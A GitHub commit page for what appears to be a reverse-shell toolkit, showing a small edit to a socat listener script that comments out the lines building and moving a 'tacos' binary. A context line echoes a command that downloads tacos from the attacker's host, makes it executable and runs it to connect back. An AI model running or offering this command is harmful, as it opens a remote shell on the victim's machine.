Skip to content

Commit

Permalink
minor fix for tacos directory
Browse files Browse the repository at this point in the history
  • Loading branch information
ariary committed Feb 27, 2022
1 parent c0fb0e3 commit c22bbe8
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions light-pty4all/socat-listener.sh
Original file line number Diff line number Diff line change
Expand Up @@ -54,8 +54,8 @@ else
fi

# put tacos in current directory
cd .. && make build.tacos && cd -
mv ../tacos .
# cd .. && make build.tacos && cd -
# mv ../tacos .

if [[ "$GITAR" ]]; then
echo "curl -O ${LHOST}:9237/pull/tacos -o tacos && chmod +x tacos && ./tacos ${LHOST}:${LPORT}"
Expand Down

0 comments on commit c22bbe8

Please sign in to comment.